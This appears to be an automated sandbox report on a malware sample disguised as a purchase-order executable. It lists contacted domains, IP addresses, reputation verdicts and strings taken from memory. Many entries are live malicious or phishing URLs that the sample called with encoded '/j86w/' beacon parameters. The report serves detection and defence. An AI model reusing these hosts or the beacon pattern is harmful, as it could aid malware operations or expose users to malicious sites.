        http://www.founder.com.cn/cn_0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.sajatypeworks.comh0%Avira URL Cloudsafe
        http://www.jamiebakes.net/j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.agfamonotype.0%URL Reputationsafe
        http://www.sajatypeworks.comu0%Avira URL Cloudsafe
        http://www.trustedhomebuying.com/j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.heiboard.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT0%Avira URL Cloudsafe
        http://www.fontbureau.coma0%URL Reputationsafe
        http://www.heiboard.xyz/j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.burntkeroseneblueheelers.com/j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh100%Avira URL Cloudmalware
        http://www.founder.com.cn/cn10%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.jupiter-directory.info/j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT100%Avira URL Cloudmalware
        http://www.sajatypeworks.comse0%Avira URL Cloudsafe
        http://www.tiro.comslntF0%Avira URL Cloudsafe
        http://www.fontbureau.comlvfet0%URL Reputationsafe
        http://www.sajatypeworks.comurs0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.fontbureau.como0%URL Reputationsafe
        http://www.popcornpor.xyz/j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT100%Avira URL Cloudphishing
        http://www.funserve.club/j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.route112mitsubishi.com/j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.comria0%Avira URL Cloudsafe
        http://www.iguaym.com/j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.coms-e0%Avira URL Cloudsafe
        http://www.deta-hedman.com/j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT0%Avira URL Cloudsafe
        http://www.sajatypeworks.com.40x0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pieprop.com
        		34.102.136.180
        		truefalse
          		unknown
          td-ccm-168-233.wixdns.net
          		34.117.168.233
          		truetrue
            		unknown
            www.iguaym.com
            		156.226.250.150
            		truetrue
              		unknown
              www.jupiter-directory.info
              		81.171.22.6
              		truetrue
                		unknown
                trustedhomebuying.com
                		38.143.25.232
                		truetrue
                  		unknown
                  route112mitsubishi.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    parking.namesilo.com
                    		209.141.38.71
                    		truefalse
                      		high
                      parkingpage.namecheap.com
                      		198.54.117.210
                      		truefalse
                        		high
                        www.burntkeroseneblueheelers.com
                        		104.21.27.132
                        		truetrue
                          		unknown
                          www.lingmao08.com
                          		172.67.219.19
                          		truetrue
                            		unknown
                            www.theminercrypto.com
                            		217.160.0.206
                            		truetrue
                              		unknown
                              shops.myshopify.com
                              		23.227.38.74
                              		truetrue
                                		unknown
                                deta-hedman.com
                                		37.97.135.188
                                		truetrue
                                  		unknown
                                  www.tsreaur.com
                                  		165.231.150.75
                                  		truetrue
                                    		unknown
                                    heiboard.xyz
                                    		34.102.136.180
                                    		truefalse
                                      		unknown
                                      shops.mycartpanda.com
                                      		104.16.100.51
                                      		truetrue
                                        		unknown
                                        danilhodoekhi.com
                                        		15.197.142.173
                                        		truetrue
                                          		unknown
                                          www.shantellonlineshoph.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.jamiebakes.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.funserve.club
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.pieprop.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.gsibralstar1.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.deta-hedman.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.popcornpor.xyz
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.trustedhomebuying.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.route112mitsubishi.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.danilhodoekhi.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.medicaleducationbangladesh.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.heiboard.xyz
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.expoj3.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown

                                                                    Contacted URLs

                                                                    NameMaliciousAntivirus DetectionReputation
                                                                    http://www.theminercrypto.com/j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuhtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuhtrue
                                                                    • Avira URL Cloud: phishing
                                                                    		unknown
                                                                    www.jupiter-directory.info/j86w/true
                                                                    • Avira URL Cloud: malware
                                                                    		low
                                                                    http://www.pieprop.com/j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfTfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.medicaleducationbangladesh.com/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptojtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.tsreaur.com/j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.danilhodoekhi.com/j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.popcornpor.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXmtrue
                                                                    • Avira URL Cloud: phishing
                                                                    		unknown
                                                                    http://www.jamiebakes.net/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7Rtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.jamiebakes.net/j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.trustedhomebuying.com/j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.heiboard.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTTfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.heiboard.xyz/j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfTfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.burntkeroseneblueheelers.com/j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuhtrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.jupiter-directory.info/j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.popcornpor.xyz/j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: phishing
                                                                    		unknown
                                                                    http://www.funserve.club/j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.route112mitsubishi.com/j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfTfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.iguaym.com/j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.deta-hedman.com/j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfTtrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    http://www.fontbureau.com/designersGPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/?PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.tiro.comntPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.founder.com.cn/cn/bThePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers?PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sajatypeworks.combutePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.tiro.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.433442083.000000000185B000.00000004.00000020.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designersPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.goodfont.co.krPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.sajatypeworks.comal1PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.sajatypeworks.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.typography.netDPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.founder.com.cn/cn/cThePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/staff/dennis.htmPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://fontfabrik.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.founder.com.cn/cn_PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432870174.000000000611B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.galapagosdesign.com/DPleasePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fonts.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.urwpp.deDPleasePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.zhongyicts.com.cnPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.sakkal.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438214913.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438091336.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438151399.0000000006123000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.sajatypeworks.comhPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.apache.org/licenses/LICENSE-2.0PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.comPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.agfamonotype.PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.sajatypeworks.comuPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.comaPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.carterandcone.comlPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.founder.com.cn/cn1PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432552226.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432870174.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432492683.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432622807.000000000611B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.founder.com.cn/cnPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432359783.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432966884.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432622807.000000000611B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.fontbureau.com/designers/frere-jones.htmlPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sajatypeworks.comsePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.tiro.comslntFPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.fontbureau.com/designers/cabarga.htmlPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.441966487.000000000610D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fontbureau.comlvfetPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.sajatypeworks.comursPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.jiyu-kobo.co.jp/PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.fontbureau.comoPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.fontbureau.com/designers8PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sajatypeworks.comriaPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.sajatypeworks.coms-ePO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.sajatypeworks.com.40xPO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          198.54.117.217
                                                                                          		unknownUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          198.54.117.218
                                                                                          		unknownUnited States
                                                                                          		22612NAMECHEAP-NETUStrue
                                                                                          209.141.38.71
                                                                                          		parking.namesilo.comUnited States
                                                                                          		53667PONYNETUSfalse
                                                                                          15.197.142.173
                                                                                          		danilhodoekhi.comUnited States
                                                                                          		7430TANDEMUStrue
                                                                                          217.160.0.206
                                                                                          		www.theminercrypto.comGermany
                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                          23.227.38.74
                                                                                          		shops.myshopify.comCanada
                                                                                          		13335CLOUDFLARENETUStrue
                                                                                          37.97.135.188
                                                                                          		deta-hedman.comNetherlands
                                                                                          		20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                                                          34.117.168.233
                                                                                          		td-ccm-168-233.wixdns.netUnited States
                                                                                          		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                          172.67.219.19
                                                                                          		www.lingmao08.comUnited States
